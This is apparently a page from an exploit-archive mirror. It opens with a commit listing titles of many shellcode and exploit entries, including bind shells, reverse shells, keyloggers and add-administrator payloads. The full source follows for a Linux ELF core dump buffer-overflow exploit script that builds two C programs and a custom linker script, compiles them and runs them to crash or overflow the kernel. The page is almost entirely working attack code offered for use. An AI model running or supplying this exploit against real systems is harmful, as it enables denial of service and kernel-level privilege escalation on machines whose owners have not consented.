2a57bee5c6
12 new exploits Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Exploit Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service FreeBSD/x86 - /bin/cat /etc/master.passwd NULL free shellcode (65 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes) Linux/x86 - execve shellcode null byte free (Generator) Linux/x86 - execve Null Free shellcode (Generator) Linux/x86 - cmd shellcode null free (Generator) Linux/x86 - cmd Null Free shellcode (Generator) iOS - Version-independent shellcode Linux/x86-64 - bindshell port:4444 shellcode (132 bytes) Linux/x86-64 - bindshell port 4444 shellcode (132 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) NULL Free shellcode (39 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes) Windows 5.0 < 7.0 x86 - null-free bindshell shellcode Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode Win32 - telnetbind by Winexec shellcode (111 bytes) Win32 - telnetbind by Winexec 23 port shellcode (111 bytes) Windows NT/2000/XP - add user _slim_ shellcode for Russian systems (318 bytes) Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes) Windows XP Pro SP2 English - _Message-Box_ Shellcode Null-Free (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Shellcode Null Free (12 bytes) Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes) Linux/x86 - /bin/sh Null-Free Polymorphic Shellcode (46 bytes) Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes) Win32 - Add new local administrator shellcode _secuid0_ (326 bytes) Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes) ARM - Bindshell port 0x1337shellcode ARM - Bindshell port 0x1337 shellcode Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Linux Kernel <= 2.4.0 - Stack Infoleaks bsd/x86 - connect back Shellcode (81 bytes) FreeBSD/x86 - connect back Shellcode (81 bytes) Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.10/11.04) - Privilege Boundary Crossing Local Root Exploit Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit Linux Kernel 2.0 / 2.1 - SIGIO Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.2 - 'ldd core' Force Reboot Debian 2.1_ Linux Kernel 2.0.x_ RedHat 5.2 - Packet Length with Options Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options Linux Kernel 2.2.x - Non-Readable File Ptrace Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak OS X 10.x_ FreeBSD 4.x_OpenBSD 2.x_Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure OS X 10.x_ FreeBSD 4.x_ OpenBSD 2.x_ Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (2) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (2) Linux Kernel 2.4 - suid execve() System Call Race Condition PoC Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1) Linux/x86 - Reverse TCP Bind Shellcode (92 bytes) Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes) Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Linux/x86-64 - Bind TCP port shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password) Linux/x86 - TCP Bind Shel shellcode l (96 bytes) Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes) Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation Windows x86 - user32!MessageBox _Hello World!_ Null-Free shellcode (199 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes) OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes) OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes) Mainframe/System Z - Bind Shell shellcode (2488 bytes) Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes) OS-X/x86-64 - tcp bind shellcode_ NULL byte free (144 bytes) OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes) Ubuntu Apport - Local Privilege Escalation Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation Linux/x86-64 - Bindshell with Password shellcode (92 bytes) Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes) Windows XP < 10 - Null-Free WinExec Shellcode (Python) (Generator) Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator) Linux/x86-64 - bind TCP port shellcode (103 bytes) Linux/x86-64 - TCP Bindshell with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes) Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes) Windows x86 - Null-Free Download & Run via WebDAV Shellcode (96 bytes) Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes) Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Windows - Null-Free Shellcode Primitive Keylogger to File (431 (0x01AF) bytes) Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow) Windows - Null-Free Shellcode Functional Keylogger to File (601 (0x0259) bytes) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) Linux/x86-64 - Null-Free Reverse TCP Shell shellcode (134 bytes) Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
195 lines
4.3 KiB
Bash
Executable file
195 lines
4.3 KiB
Bash
Executable file
/*
|
|
source: http://www.securityfocus.com/bid/13589/info
|
|
|
|
The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call.
|
|
|
|
To exploit this vulnerability, a malicious user creates a malicious ELF executable designed to create a negative 'len' variable in 'elf_core_dump()'.
|
|
|
|
Local users may exploit this vulnerability to execute arbitrary machine code in the context of the kernel, facilitating privilege escalation.
|
|
|
|
**Update: This vulnerability does not exist in the 2.6 kernel tree.
|
|
*/
|
|
|
|
#!/bin/bash
|
|
#
|
|
# elfcd.sh
|
|
# warning: This code will crash your machine
|
|
#
|
|
cat <<__EOF__>elfcd1.c
|
|
/*
|
|
* Linux binfmt_elf core dump buffer overflow
|
|
*
|
|
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
|
|
*
|
|
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
|
|
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
|
|
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
|
|
*
|
|
*/
|
|
// phase 1
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <errno.h>
|
|
#include <unistd.h>
|
|
|
|
#include <sys/time.h>
|
|
#include <sys/resource.h>
|
|
|
|
#include <asm/page.h>
|
|
|
|
|
|
static char *env[10], *argv[4];
|
|
static char page[PAGE_SIZE];
|
|
static char buf[PAGE_SIZE];
|
|
|
|
|
|
void fatal(const char *msg)
|
|
{
|
|
if(!errno) {
|
|
fprintf(stderr, "\nFATAL: %s\n", msg);
|
|
}
|
|
else {
|
|
printf("\n");
|
|
perror(msg);
|
|
}
|
|
fflush(stdout); fflush(stderr);
|
|
_exit(129);
|
|
}
|
|
|
|
|
|
int main(int ac, char **av)
|
|
{
|
|
int esp, i, r;
|
|
struct rlimit rl;
|
|
|
|
__asm__("movl %%esp, %0" : : "m"(esp));
|
|
printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], av[ac-1]+strlen(av[ac-1]), esp);
|
|
rl.rlim_cur = RLIM_INFINITY;
|
|
rl.rlim_max = RLIM_INFINITY;
|
|
r = setrlimit(RLIMIT_CORE, &rl);
|
|
if(r) fatal("setrlimit");
|
|
|
|
memset(env, 0, sizeof(env) );
|
|
memset(argv, 0, sizeof(argv) );
|
|
memset(page, 'A', sizeof(page) );
|
|
page[PAGE_SIZE-1]=0;
|
|
|
|
// move up env & exec phase 2
|
|
if(!strcmp(av[0], "AAAA")) {
|
|
printf("\n[+] phase 2, <RET> to crash "); fflush(stdout);
|
|
argv[0] = "elfcd2";
|
|
argv[1] = page;
|
|
|
|
// term 0 counts!
|
|
memset(buf, 0, sizeof(buf) );
|
|
for(i=0; i<789 + 4; i++)
|
|
buf[i] = 'C';
|
|
argv[2] = buf;
|
|
execve(argv[0], argv, env);
|
|
_exit(127);
|
|
}
|
|
|
|
// move down env & reexec
|
|
for(i=0; i<9; i++)
|
|
env[i] = page;
|
|
|
|
argv[0] = "AAAA";
|
|
printf("\n[+] phase 1"); fflush(stdout);
|
|
execve(av[0], argv, env);
|
|
|
|
return 0;
|
|
}
|
|
__EOF__
|
|
cat <<__EOF__>elfcd2.c
|
|
// phase 2
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <syscall.h>
|
|
|
|
#include <sys/syscall.h>
|
|
|
|
#include <asm/page.h>
|
|
|
|
#define __NR_sys_read __NR_read
|
|
#define __NR_sys_kill __NR_kill
|
|
#define __NR_sys_getpid __NR_getpid
|
|
|
|
|
|
char stack[4096 * 6];
|
|
static int errno;
|
|
|
|
|
|
inline _syscall3(int, sys_read, int, a, void*, b, int, l);
|
|
inline _syscall2(int, sys_kill, int, c, int, a);
|
|
inline _syscall0(int, sys_getpid);
|
|
|
|
|
|
// yeah, lets do it
|
|
void killme()
|
|
{
|
|
char c='a';
|
|
int pid;
|
|
|
|
pid = sys_getpid();
|
|
for(;;) {
|
|
sys_read(0, &c, 1);
|
|
sys_kill(pid, 11);
|
|
}
|
|
}
|
|
|
|
|
|
// safe stack stub
|
|
__asm__(
|
|
" nop \n"
|
|
"_start: movl \$0xbfff6ffc, %esp \n"
|
|
" jmp killme \n"
|
|
".global _start \n"
|
|
);
|
|
__EOF__
|
|
cat <<__EOF__>elfcd.ld
|
|
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
|
|
"elf32-i386")
|
|
OUTPUT_ARCH(i386)
|
|
ENTRY(_start)
|
|
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); SEARCH_DIR(/usr/i486-suse-linux/lib);
|
|
|
|
MEMORY
|
|
{
|
|
ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000
|
|
rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000
|
|
}
|
|
|
|
PHDRS
|
|
{
|
|
headers PT_PHDR PHDRS ;
|
|
text PT_LOAD FILEHDR PHDRS ;
|
|
fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ;
|
|
}
|
|
|
|
SECTIONS
|
|
{
|
|
|
|
.dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme
|
|
|
|
. = 0xbfff0000 + SIZEOF_HEADERS;
|
|
.text : { *(.text) } >ram :text
|
|
.data : { *(.data) } >ram :text
|
|
.bss :
|
|
{
|
|
*(.dynbss)
|
|
*(.bss)
|
|
*(.bss.*)
|
|
*(.gnu.linkonce.b.*)
|
|
*(COMMON)
|
|
. = ALIGN(32 / 8);
|
|
} >ram :text
|
|
|
|
}
|
|
__EOF__
|
|
|
|
# compile & run
|
|
echo -n "[+] Compiling..."
|
|
gcc -O2 -Wall elfcd1.c -o elfcd1
|
|
gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static
|
|
./elfcd1
|